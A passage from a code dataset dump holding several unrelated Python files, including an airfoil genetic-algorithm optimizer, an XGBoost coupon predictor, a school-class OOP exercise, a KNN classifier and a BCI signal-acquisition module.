operators\n toolbox.register('evaluate', get_wing_CDp)\n toolbox.register('select', tools.selTournament, tournsize=6)\n # toolbox.register('mate', tools.cxSimulatedBinaryBounded,\n # low=(max_camber_min, max_camber_loc_min,\n # max_tc_min),\n toolbox.register('mate', tools.cxUniform, indpb=1/3)\n toolbox.register('mutate', tools.mutUniformInt,\n low=(max_camber_min, max_camber_loc_min, max_tc_min),\n up=(max_camber_max, max_camber_loc_max, max_tc_max),\n indpb=1/3)\n\n population = toolbox.population_creator(n=population_size)\n\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register('min', np.min)\n stats.register('avg', np.mean)\n\n hof = tools.HallOfFame(hall_of_fame_size)\n\n population, logbook = algorithms.eaSimple(population, toolbox,\n cxpb=p_crossover,\n mutpb=p_mutation,\n ngen=max_generations,\n stats=stats, halloffame=hof,\n verbose=True)\n\n minFitnessValues, meanFitnessValues = logbook.select(\"min\", \"avg\")\n\n fig = plt.figure(dpi=1200)\n ax = fig.add_subplot(111)\n ax.plot(minFitnessValues, color='red', label='Min FV')\n ax2 = ax.twinx()\n ax2.plot(meanFitnessValues, color='green', label='Mean FV')\n ax.set_xlabel('Generation')\n ax.set_ylabel(r'$\\mathdefault{Minimum C_{D_{p}}}$')\n ax2.set_ylabel(r'Average $\\mathdefault{C_{D_{p}}}$')\n ax.set_xlim(left=0)\n\n# hof_file = open('airfoil_hof.txt', 'w')\n for i in range(hall_of_fame_size):\n max_cam = hof.items[i][0]\n max_cam_loc = hof.items[i][1]\n max_tc = hof.items[i][2]\n\n airfoil_name = ('NACA({0:.2f})({1:.2f})({2:.2f})'.format(\n max_cam, max_cam_loc, max_tc))\n\n naca_4_series(max_cam, max_cam_loc, max_tc, 100, plot_switch=True)\n alpha_array, cl_array, cd_array = runXfoil(airfoil_name, Re, -10, 10,\n 0.25)\n\n# CDp = hof.items[i].fitness.values[0]\n alpha_i = get_3D_aerodynamics(AR, Lambda_midc, cl_r, alpha_array,\n cl_array, cd_array)[0]\n\n # hof_file.write(airfoil_name + '\\t\\t')\n # hof_file.write('{0}\\t\\t'.format(CDp))\n # hof_file.write('{0}\\n'.format(alpha_i))\n\n if i == 0:\n best_airfoil = hof.items[i]\n best_alpha_i = alpha_i\n # hof_file.close()\n\n return best_airfoil, best_alpha_i\n\n\ndef main():\n\n airfoil, alpha_i = optimize_airfoil(50, 20, 0.5, 0.95)\n create_VSP_wing(b, planform, airfoil, alpha_i)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2 - Conceptual Design/4 - Wing Design/airfoil_optimization.py","file_name":"airfoil_optimization.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521910857","text":"import matplotlib.pyplot as plt\nfrom matplotlib.ticker import EngFormatter\n\nimport sqlite3\nimport numpy as np\n\nfrom event_plotter.event_plotter import EventPlotter\nfrom event_analysis.event_analysis import EventAnalysis\n\n\ndef run(signal_period, test_trigid_list, temps_avant, temps_apres):\n\n for test_trigid in test_trigid_list:\n one_amplitude(signal_period, test_trigid, temps_avant, temps_apres)\n\n\ndef one_amplitude(signal_period, test_trigid, temps_avant, temps_apres):\n\n db_path = r\"/Users/gabrielduran/Trabajo/events_scripts/samples/RUN010_sample.sqlite\"\n\n db_con = sqlite3.connect(db_path)\n\n # test_trigid = 114733978\n\n channel = 2\n\n tester = \"STB029\"\n\n MyPlotter = EventPlotter()\n Analyst = EventAnalysis()\n\n # ax, *_ = MyPlotter.plot_single_event(test_trigid, channel, tester, 0, db_con=db_con)\n\n fig, axes = plt.subplots(3, 1)\n\n y1, t1 = Analyst.get_event_value_and_time(db_con, test_trigid, channel, tester)\n\n # signal_period = 1.6666e-6\n\n n_samples = len(y1)\n\n decalage_samples = n_samples - len(np.where(t1 > t1[0] + signal_period)[0])\n\n new_n_samples = n_samples + decalage_samples\n\n t2 = np.zeros(new_n_samples)\n\n extra_times = (t1[1] - t1[0]) * np.array(list(range(int(decalage_samples)))) + t1[-1]\n\n t2[n_samples:] = extra_times\n t2[:n_samples] = t1\n\n y2 = np.zeros(new_n_samples)\n y2[decalage_samples:] = y1\n\n y3 = np.append(y2[:-decalage_samples] - y1, y2[-decalage_samples:])\n\n marker = \"x\"\n markersize = 0.2\n\n axes[0].scatter(t1, y1, marker=marker, linewidths=markersize)\n axes[1].scatter(t2, y2, marker=marker, linewidths=markersize)\n axes[2].scatter(t2, y3, marker=marker, linewidths=markersize)\n\n for ax in axes:\n ax.xaxis.set_major_formatter(EngFormatter(unit=\"s\"))\n\n error_zone = np.where(t2 > temps_avant)\n error_zone_2 = np.where(t2[error_zone] < temps_apres) + error_zone[0][0] - 1\n\n error_y = y3[error_zone_2[0]]\n error_t = t2[error_zone_2[0]]\n\n for index, ax in enumerate(axes):\n if index in [0,1]:\n ax.set_xlim(left=t1.min(), right=t1.max())\n\n else:\n ax.set_xlim(left=temps_avant, right=temps_apres)\n\n plt.plot(error_t, error_y, c='r')\n\n my_min = error_y.min()\n my_max = error_y.max()\n\n print(\"min: \" + str(my_min) + \"; max: \" + str(my_max) + \"; amplitude: \" + str(my_max - my_min))\n\n fig.suptitle(\"Trigid: \" + str(test_trigid))\n\n plt.show()\n\n\ntest_trigid_list = [89237587] # , 114733974, 114734005, 114734051]\n\nsignal_period = 1.6666e-6\nrun(signal_period, test_trigid_list, temps_avant=-signal_period*0.6, temps_apres=signal_period*0.6)\n","sub_path":"soustraire_courbes.py","file_name":"soustraire_courbes.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"46984225","text":"import datetime\r\nimport os\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.metrics import auc, roc_curve\r\n\r\n\r\ndef get_processed_data():\r\n dataset1 = pd.read_csv('data_preprocessed_3/ProcessDataSet1.csv')\r\n dataset2 = pd.read_csv('data_preprocessed_3/ProcessDataSet2.csv')\r\n dataset3 = pd.read_csv('data_preprocessed_3/ProcessDataSet3.csv')\r\n\r\n dataset1.drop_duplicates(inplace=True)\r\n dataset2.drop_duplicates(inplace=True)\r\n dataset3.drop_duplicates(inplace=True)\r\n\r\n dataset12 = pd.concat([dataset1, dataset2], axis=0)\r\n\r\n dataset12.fillna(0, inplace=True)\r\n dataset3.fillna(0, inplace=True)\r\n\r\n return dataset12, dataset3\r\n\r\n\r\ndef train_xgb(dataset12, dataset3):\r\n predict_dataset = dataset3[['User_id', 'Coupon_id', 'Date_received']].copy()\r\n predict_dataset.Date_received = pd.to_datetime(predict_dataset.Date_received, format='%Y-%m-%d')\r\n predict_dataset.Date_received = predict_dataset.Date_received.dt.strftime('%Y%m%d')\r\n\r\n # 将数据转化为dmatric格式\r\n dataset12_x = dataset12.drop(\r\n columns=['User_id', 'Merchant_id', 'Discount_rate', 'Date_received', 'discount_rate_x', 'discount_rate_y',\r\n 'Date', 'Coupon_id', 'label'], axis=1)\r\n dataset3_x = dataset3.drop(\r\n columns=['User_id', 'Merchant_id', 'Discount_rate', 'Date_received', 'discount_rate_x', 'discount_rate_y',\r\n 'Coupon_id'], axis=1)\r\n\r\n train_dmatrix = xgb.DMatrix(dataset12_x, label=dataset12.label)\r\n predict_dmatrix = xgb.DMatrix(dataset3_x)\r\n\r\n # xgboost模型训练\r\n params = {'booster': 'gbtree',\r\n 'objective': 'binary:logistic',\r\n 'eval_metric': 'auc',\r\n 'gamma': 0.1,\r\n 'min_child_weight': 1.1,\r\n 'max_depth': 5,\r\n 'lambda': 10,\r\n 'subsample': 0.7,\r\n 'colsample_bytree': 0.7,\r\n 'colsample_bylevel': 0.7,\r\n 'eta': 0.02,\r\n # 'tree_method': 'gpu_hist',\r\n # 'gpu_id': '1',\r\n # 'n_gpus': '-1',\r\n 'seed': 0,\r\n 'nthread': cpu_jobs,\r\n # 'predictor': 'gpu_predictor'\r\n }\r\n\r\n # 使用xgb.cv优化num_boost_round参数\r\n cvresult = xgb.cv(params, train_dmatrix, num_boost_round=10000, nfold=2, metrics='auc', seed=0, callbacks=[\r\n xgb.callback.print_evaluation(show_stdv=False),\r\n xgb.callback.early_stop(40)\r\n ])\r\n num_round_best = cvresult.shape[0] - 1\r\n print('Best round num: ', num_round_best)\r\n\r\n # 使用优化后的num_boost_round参数训练模型\r\n watchlist = [(train_dmatrix, 'train')]\r\n model = xgb.train(params, train_dmatrix, num_boost_round=num_round_best, evals=watchlist)\r\n\r\n model.save_model('train_dir_2/xgbmodel4')\r\n params['predictor'] = 'cpu_predictor'\r\n model = xgb.Booster(params)\r\n model.load_model('train_dir_2/xgbmodel4')\r\n\r\n # predict test set\r\n dataset3_predict = predict_dataset.copy()\r\n dataset3_predict['label'] = model.predict(predict_dmatrix)\r\n\r\n # 标签归一化\r\n dataset3_predict.label = MinMaxScaler(copy=True, feature_range=(0, 1)).fit_transform(\r\n dataset3_predict.label.values.reshape(-1, 1))\r\n dataset3_predict.sort_values(by=['Coupon_id', 'label'], inplace=True)\r\n dataset3_predict.to_csv(\"train_dir_2/xgb_preds_6.csv\", index=None, header=None)\r\n print(dataset3_predict.describe())\r\n\r\n # 在dataset12上计算auc\r\n # model = xgb.Booster()\r\n # model.load_model('train_dir_2/xgbmodel')\r\n\r\n temp = dataset12[['Coupon_id', 'label']].copy()\r\n temp['pred'] = model.predict(xgb.DMatrix(dataset12_x))\r\n temp.pred = MinMaxScaler(copy=True, feature_range=(0, 1)).fit_transform(temp['pred'].values.reshape(-1, 1))\r\n print(myauc(temp))\r\n\r\n\r\n# 性能评价函数\r\ndef myauc(test):\r\n testgroup = test.groupby(['Coupon_id'])\r\n aucs = []\r\n for i in testgroup:\r\n tmpdf = i[1]\r\n if len(tmpdf['label'].unique()) != 2:\r\n continue\r\n fpr, tpr, thresholds = roc_curve(tmpdf['label'], tmpdf['pred'], pos_label=1)\r\n aucs.append(auc(fpr, tpr))\r\n return np.average(aucs)\r\n\r\n\r\nif __name__ == '__main__':\r\n start = datetime.datetime.now()\r\n print(start.strftime('%Y-%m-%d %H:%M:%S'))\r\n # log = '%s\\n' % start.strftime('%Y-%m-%d %H:%M:%S')\r\n cpu_jobs = os.cpu_count() - 1\r\n date_null = pd.to_datetime('1970-01-01', format='%Y-%m-%d')\r\n\r\n dataset12, dataset3 = get_processed_data()\r\n # analysis()\r\n # detect_duplicate_columns()\r\n # feature_importance_score()\r\n\r\n # grid_search_gbdt()\r\n # train_gbdt()\r\n # predict('gbdt')\r\n\r\n # grid_search_xgb()\r\n train_xgb(dataset12, dataset3)\r\n\r\n # print('predict: start predicting......')\r\n # # predict('xgb')\r\n # print('predict: predicting finished.')\r\n\r\n # log += 'time: %s\\n' % str((datetime.datetime.now() - start)).split('.')[0]\r\n # log += '----------------------------------------------------\\n'\r\n # open('%s.log' % os.path.basename(__file__), 'a').write(log)\r\n # print(log)\r\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\r\n print('time costed is: %s s' % (datetime.datetime.now() - start).seconds)","sub_path":"Anaylsis/xgb_predict.py","file_name":"xgb_predict.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"474173555","text":"import dataExtractor as de\nimport torch\n\na = de.DataAdjust('data/test_data.csv',drop=False)\n\ntest = de.TrajDataSet(a.get_data_Frame(),mem_nb=3)\ntest_loader = torch.utils.data.DataLoader(test,batch_size=1,shuffle=False)\n#state = next(iter(test_loader))\n#exemple = test[0]\n#print(f'\\n---------------\\n Voici notre état \\n {state} \\n ---------------')\n#print(f'Voici ce que nous renvoie le 10 élément de test \\n {exemple} \\n ---------------')\n#print(f'Le contenu de test avant le passage à torch : \\n {test.get_traj()[0:3]} \\n ---------------')\n#print(f'La shape de notre Tenseur renvoyé par le test_loader : state {state[0].shape} et action {state[1].shape}')\n\n############# Test du Réseau de neurones \nprint('Avant les test.')\ncouche = torch.nn.Linear(2, 2)\n\n(state,action) = next(iter(test_loader))\naction = couche.forward(state.float())\n\noutput = couche(state.float())\nprint(state.numpy()[0][0])\nprint('Test réussi')\n","sub_path":"Network_with_memory/buufer_tester.py","file_name":"buufer_tester.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210510702","text":"\"\"\"\n=================================================================================================================\nЗадание-37:\nРеализуйте описаную ниже задачу, используя парадигмы ООП:\nВ школе есть Классы(5А, 7Б и т.д.), в которых учатся Ученики. У каждого ученика есть два Родителя(мама и папа).\nТакже в школе преподают Учителя, один учитель может преподавать в неограниченном кол-ве классов\nсвой определенный предмет. Т.е. Учитель Иванов может преподавать математику у 5А и 6Б, но больше математику не\nможет преподавать никто другой.\n\nВыбранная и заполненная данными структура должна решать следующие задачи:\n1. Получить полный список всех классов школы (DONE+)\n2. Получить список всех учеников в указанном классе (каждый ученик отображается в формате \"Фамилия И.О.\") (DONE+)\n3. Получить список всех предметов указанного ученика (Ученик --> Класс --> Учителя --> Предметы) (DONE)\n4. Узнать ФИО родителей указанного ученика (DONE+)\n5. Получить список всех Учителей, преподающих в указанном классе (DONE+)\n=================================================================================================================\n\"\"\"\n\n\nclass Common:\n def __init__(self, name, surname, birth_date, school):\n self.name = name\n self.surname = surname\n self.birth_date = birth_date\n self.school = school\n\n def get_full_name(self):\n return \"Полное имя: {}\".format(self.name + ' ' + self.surname)\n\n\nclass Student(Common):\n def __init__(self, name, surname, birth_date, school, class_room, father, mother):\n Common.__init__(self, name, surname, birth_date, school)\n self._class_room = {'class_num': int(class_room.split()[0]),\n 'class_char': class_room.split()[1]}\n self.father = father\n self.mother = mother\n\n @property\n def get_short_name(self):\n return self.surname + ' ' + self.name[0] + '.' + self.father[0] + '.'\n\n @property\n def parents(self):\n parents_names = str(self.father) + ' и ' + str(self.mother)\n return \"Родители ученика '{}': {}\".format(self.get_short_name, parents_names)\n\n @property\n def class_room(self):\n return \"{} {}\".format(self._class_room['class_num'], \\\n self._class_room['class_char'])\n\n def list_of_classes(self, students):\n list_of_classes = []\n for Student in students:\n if Student.class_room not in list_of_classes:\n list_of_classes.append(Student.class_room)\n print(\"Список всех классов школы: {}\".format(list_of_classes))\n\n def classmates(self, students):\n list_of_classes = []\n for Student in students:\n if Student.class_room not in list_of_classes:\n list_of_classes.append(Student.class_room)\n\n for i in list_of_classes:\n classmates = []\n for Student in students:\n if i == Student.class_room:\n classmates.append(Student.get_short_name)\n a = Student.class_room\n print(\"Список учеников класса {}: {}\".format(a, classmates))\n\n\nclass Teacher(Common):\n def __init__(self, name, surname, birth_date, school, teach_classes, discipline):\n Common.__init__(self, name, surname, birth_date, school)\n self.teach_classes = list(teach_classes)\n self.discipline = list(discipline)\n\n def list_of_teachers(self, teachers):\n list_of_classes2 = []\n for Teacher in teachers:\n for i in self.teach_classes:\n if i not in list_of_classes2:\n list_of_classes2.append(i)\n for j in list_of_classes2:\n list_of_teachers = []\n for Teacher in teachers:\n if j in Teacher.teach_classes:\n list_of_teachers.append(Teacher.get_full_name())\n print(\"Список учителей класса {}: {}\".format(j, list_of_teachers))\n\ndef list_of_disciplines(students, teachers):\n for Student in students:\n courses = []\n for Teacher in teachers:\n if Student.class_room in Teacher.teach_classes:\n courses.append(Teacher.discipline)\n print(\"Список предметов уч-ка {}: {}\".format(Student.get_short_name, courses))\n\nstudents = [Student(\"Александр\", \"Иванов\", '10.11.1998', \"Лицей №5\", \"5 А\", \"Семён\", \"Ольга\"),\n Student(\"Анастасия\", \"Соколова\", '10.05.1998', \"Лицей №5\", \"5 А\", \"Василий\", \"Наталья\"),\n Student(\"Алексей\", \"Сидоров\", '12.03.1998', \"Лицей №5\", \"5 Б\", \"Дмитрий\", \"Елена\"),\n Student(\"Василиса\", \"Сидорова\", '07.04.1998', \"Лицей №5\", \"5 Б\", \"Дмитрий\", \"Елена\"),\n Student(\"Матвей\", \"Чижиков\", '11.05.1998', \"Лицей №5\", \"5 В\", \"Константин\", \"Валерия\"),\n Student(\"Дмитрий\", \"Питонов\", '16.06.1998', \"Лицей №5\", \"5 В\", \"Станислав\", \"Екатерина\"),\n Student(\"Алёна\", \"Комиссарова\", '15.04.1996', \"Лицей №5\", \"7 А\", \"Василий\", \"Марина\"),\n Student(\"Никита\", \"Фича\", '03.05.1996', \"Лицей №5\", \"7 А\", \"Сергей\", \"Оксана\"),\n Student(\"Анна\", \"Обновлюха\", '11.02.1996', \"Лицей №5\", \"7 Б\", \"Александр\", \"Ксения\"),\n Student(\"Петр\", \"Владимиров\", '17.06.1996', \"Лицей №5\", \"7 Б\", \"Алексей\", \"Анастатия\"),\n Student(\"Мария\", \"Петрова\", '12.07.1996', \"Лицей №5\", \"7 Б\", \"Николай\", \"Маргарита\"),\n ]\n\nteachers = [Teacher(\"Сергей\", \"Михайлов\", '07.10.1978', \"Лицей №5\", [\"7 А\", \"7 Б\"], \\\n [\"Информатика\", \"Физкультура\"]),\n Teacher(\"Леонид\", \"Вассерман\", '10.03.1965', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Алгебра\", \"Геометрия\", \"Физика\"]),\n Teacher(\"Валентина\", \"Вассерман\", '10.03.1971', \"Лицей №5\", [\"7 А\", \"7 Б\"], [\"Химия\", \"Биология\"]),\n Teacher(\"Екатерина\", \"Васильева\", '10.03.1995', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Иностранный язык\"]),\n Teacher(\"Анна\", \"Добрая\", '10.03.1965', \"Лицей №5\", [\"7 А\", \"7 Б\"], [\"История\", \"Обществознание\"]),\n Teacher(\"Валентина\", \"Петр��ва\", '11.09.1959', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Русский язык\", \"Литература\"]),\n ]\n\nprint(\"=========================РОДИТЕЛИ УЧЕНИКА=============================\")\nprint(students[0].parents)\n\nprint(\"==============================КЛАССЫ==================================\")\nlist_of_classes1 = []\nfor Student in students:\n if Student.class_room not in list_of_classes1:\n list_of_classes1.append(Student.class_room)\nprint(\"Список всех классов школы: {}\".format(list_of_classes1))\n\n# ИЛИ:\nprint(Student.list_of_classes(students))\n\nprint(\"==========================УЧИТЕЛЯ КЛАССОВ=============================\")\nfor i in list_of_classes1:\n list_of_teachers = []\n for Teacher in teachers:\n if i in Teacher.teach_classes:\n list_of_teachers.append(Teacher.get_full_name())\n print(\"Список учителей класса {}: {}\".format(i, list_of_teachers))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(Teacher.list_of_teachers(teachers))\n\nprint(\"=========================УЧЕНИКИ КЛАССОВ==============================\")\nfor i in list_of_classes1:\n classmates1 = []\n for Student in students:\n if i == Student.class_room:\n classmates1.append(Student.get_short_name)\n print(\"Список учеников класса {}: {}\".format(i, classmates1))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(Student.classmates(students))\n\nprint(\"=========================ПРЕДМЕТЫ УЧЕНИКА=============================\")\n\n# Преподаватель обязательно ведёт все свои предметы во всех своих классах\nfor Student in students:\n courses = []\n for Teacher in teachers:\n if Student.class_room in Teacher.teach_classes:\n courses.append(Teacher.discipline)\n print(\"Список предметов уч-ка {}: {}\".format(Student.get_short_name, courses))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(list_of_disciplines(students, teachers))\n\nprint(\"=====================СПИСОК ВСЕХ УЧЕНИКОВ ШКОЛЫ=======================\")\nfor num, Student in enumerate(students, start=1):\n print(\"{}) {} {} {}\".format(num, Student.get_short_name, Student.class_room, Student.parents))\nprint(\"==============================TEST====================================\")\nprint(students[2].get_full_name())\nprint(students[2].get_short_name)\nprint(students[2].class_room)\nprint(teachers[1].get_full_name())\nprint(teachers[1].teach_classes)\nprint(teachers[1].discipline)\n","sub_path":"Python: level 1 (typical exs.)/Exercise_37.py","file_name":"Exercise_37.py","file_ext":"py","file_size_in_byte":10320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644421106","text":"from sklearn.utils import shuffle\n\nclass KNeighborsClassifier():\n def __init__(self, n_neighbors=5):\n self.n_neighbors = n_neighbors\n self.X=None\n self.y=None\n self.y_list=None\n self.dimension=1\n\n def fit(self, X, y):\n if not isinstance(X, list) or not isinstance(y, list):\n raise ValueError('Input type has to be list')\n self.X, self.y = shuffle(X, y, random_state=0)\n self.y_list=list(set(y))\n self.dimension = len(self.X[0])\n\n def predict(self, X):\n pred_results = []\n for target_x in X:\n predict=''\n dists=[]\n neighbors=[]\n labels = list(self.y)\n\n for i in range(len(self.X)):\n dist = 0\n for j in range(self.dimension):\n dist += (self.X[i][j] - target_x[j])**2\n dists.append(dist)\n\n for i in range(self.n_neighbors):\n neighbors.append(self.__get_min(dists, labels))\n\n last_min_x = neighbors[self.n_neighbors-1][0]\n while last_min_x == min(dists):\n neighbors.append(self.__get_min(dists, labels))\n\n neighbor_labels = [i[1] for i in neighbors]\n max_cnt=0\n for label in self.y_list:\n cnt = neighbor_labels.count(label)\n if max_cnt < cnt :\n max_cnt = cnt\n predict = label\n\n pred_results.append(predict)\n if len(pred_results)==1 :\n return pred_results[0]\n return pred_results\n\n def __get_min(self, dists, labels):\n min_x = min(dists)\n min_index = dists.index(min_x)\n result = list([min_x, labels[min_index]])\n dists.remove(min_x)\n del labels[min_index]\n return result","sub_path":"Data/knn-classifier/knn_classifier.py","file_name":"knn_classifier.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471755606","text":"def AsalSayi(sayi):\n if (sayi > 1):\n for i in range(2,sayi):\n if (sayi % i == 0):\n return False\n return True\n\n else:\n return False\n\n\nwhile True:\n if(AsalSayi(int(input(\"Asallığını sorgulamak istediğiniz sayıyı girin: \")))):\n print(\"Sayınız Asal\")\n else:\n print(\"Sayınız asal değil\")\n","sub_path":"AsalSayıSorgulama.py","file_name":"AsalSayıSorgulama.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"187114156","text":"# Copyright (c) James Percent and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys\nimport time\n\nimported_neural_signal = False\nno_bci = False\n\ntry:\n #from unlock.bci.acquire.neuralsignal import create_timer\n from unlock.bci.acquire.random_signal import create_timer, create_random_signal\n imported_neural_signal = True\nexcept:\n assert sys.platform == 'darwin' or sys.platform == 'linux'\n no_bci = True\n\ntry:\n from unlock.bci.acquire.mobilab_signal import create_nonblocking_mobilab_signal\nexcept Exception as e:\n print(\"unlock/acquire.__init__.py: mobilab not present\", e)\n\ntry:\n from unlock.bci.acquire.enobio_signal import create_nonblocking_enobio_signal\nexcept:\n print(\"unlock/acquire.__init__.py: enobio not present\")\n\ntry:\n from unlock.bci.acquire.nidaq_signal import create_nidaq_signal\nexcept:\n print(\"unlock/acquire.__init__.py: nidaq not present\")\n\nfrom unlock.bci.acquire.audio_signal import *\nfrom unlock.bci.acquire.file_signal import *\n\nclass NoBciRandomSignal(object):\n def __init__(self,channels=8, seed=42, lower_bound=1, upper_bound=65536):\n super(NoBciRandomSignal, self).__init__()\n import random\n self.chans = channels\n self.rand = random.Random()\n self.rand.seed(seed)\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n \n def open(self, macaddr):\n self.mac = macaddr\n return True\n \n def init(self, channels):\n self.chans = channels\n return True\n \n def channels(self):\n return self.chans\n \n def start(self):\n return True\n \n def acquire(self):\n return 1 * self.chans\n \n def getdata(self, samples):\n import numpy as np\n ret = np.array([float(self.rand.randint(self.lower_bound, self.upper_bound)) for i in range(0, samples)])\n ret[-1] = 0\n return ret\n \n def getEaplsedMicros(self):\n pass\n \n def timestamp(self):\n pass\n \n def stop(self):\n pass\n \n def close(self): \n pass\n\nclass BasicTimer(object):\n def __init__(self):\n self.start = time.time()\n\n def elapsedMicroSecs(self):\n return time.time() - self.start\n\n\nclass UnlockAcquisitionFactory:\n def __init__(self):\n if imported_neural_signal:\n self.timer = create_timer()\n else:\n self.timer = BasicTimer()\n\n def create_nidaq_signal(self):\n signal = create_nidaq_signal(self.timer)\n if not signal.start():\n raise RuntimeError('Failed to start National Instruments DAQ')\n return signal\n #for j in range(50):\n # ret = daq.acquire()\n # ret = daq.getdata(ret)\n # f = open('test.data', 'wb')\n # import numpy as np\n # a = np.array(ret, dtype='float64')\n # a = a.reshape((500, 4))\n # #np.savetxt(f, a, fmt='%d', delimiter='\\t')\n # for i in range(20):\n # print(a[i])\n #\n\n def create_audio_signal(self):\n signal = AudioSignal()\n if not signal.start():\n raise RuntimeError('failed to start audio signal')\n return signal\n\n def create_enobio_signal(self, mac_addr):\n assert 'mac_addr' in self.config['signal']\n mac_addr = [int(value,0) for value in [x.strip() for x in self.config['signal']['mac_addr'].split(',')]]\n signal = create_nonblocking_enobio_signal(self.timer)\n if not signal.open(mac_addr):\n print('enobio did not open')\n raise RuntimeError('enobio did not open')\n if not signal.start():\n print('enobio device did not start streaming')\n raise RuntimeError('enobio device did not start streaming')\n return signal\n\n def create_mobilab_signal(self, com_port, analog_channels_bitmask):\n from unlock.bci import acquire\n signal = create_nonblocking_mobilab_signal(\n self.timer, analog_channels_bitmask, 0, com_port)\n\n if not signal.start():\n print('mobilab device did not start streaming')\n raise RuntimeError('mobilab device did not start streaming')\n return signal\n\n def create_file_signal(self, timer):\n from unlock.bci import acquire\n timer = acquire.create_timer()\n raise Exception(\"FIX ME\")\n signal = acquire.MemoryResidentFileSignal(self.config['bci']['signal']['file'], timer, channels=17) #analysis/data/valid/emg_signal_1380649383_tongue_c.5_r.5_i1.txt',\n\n if not signal.start():\n print('file signal failed to start; filename = ', self.config['filename'])\n raise RuntimeError('file signal failed to start')\n return signal\n\n def create_random_signal(self):\n if no_bci:\n signal = NoBciRandomSignal()\n else:\n from unlock.bci import acquire\n signal = create_random_signal(self.timer)\n signal.open([])\n signal.start()\n return signal\n\n","sub_path":"unlock/bci/acquire/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"649218453","text":"\nimport math\n\nINFLECTION = 800\n\nMAX_WIDTH = 1300\nMAX_HEIGHT = 2500\n\nMAX_DIST = math.sqrt(\n ((MAX_WIDTH)**2) + ((MAX_HEIGHT)**2)\n)\n\n\ndef _are_opposite_ends_of_page(y1, y2, page_height):\n if y1 < 450 and page_height - y2 < 450:\n return True\n if y2 < 450 and page_height - y1 < 450:\n return True\n return False\n\n\ndef adjusted_euclidean_distance(ld1, ld2, context):\n\n x1, y1 = ld1['rect']['x'], ld1['rect']['y']\n x2, y2 = ld2['rect']['x'], ld2['rect']['y']\n\n # euc_dist_orig = math.sqrt(\n # ((x2-x1)**2) + ((y2-y1)**2)\n # )\n page_height = context['page_height']\n\n scaled_height_diff = height_diff = abs(y2-y1)\n if scaled_height_diff > INFLECTION:\n scaled_height_diff = INFLECTION + ((scaled_height_diff-INFLECTION) / 2)\n scaled_height_diff = min(MAX_HEIGHT, scaled_height_diff)\n\n width_diff = min(MAX_WIDTH, abs(x2-x1)) # cap height and width at 2500 and 1300\n\n euc_dist_scaled = math.sqrt(\n (width_diff**2) + (scaled_height_diff**2)\n )\n\n if euc_dist_scaled < 170:\n # too close\n return 0.5\n\n # scale to between 0 and 1\n euc_dist_scaled = min(MAX_DIST, euc_dist_scaled) / MAX_DIST\n\n if page_height > 1400 and _are_opposite_ends_of_page(y1, y2, page_height):\n euc_dist_scaled *= 1.2\n euc_dist_scaled = min(1, euc_dist_scaled)\n elif height_diff < 1400 and (abs(x2-x1) < 5 or abs(y2-y1) < 5):\n # if horizontally or vertically aligned\n euc_dist_scaled *= 0.7\n\n return euc_dist_scaled\n\n\ndef standard_euclidean_distance(ld1, ld2, 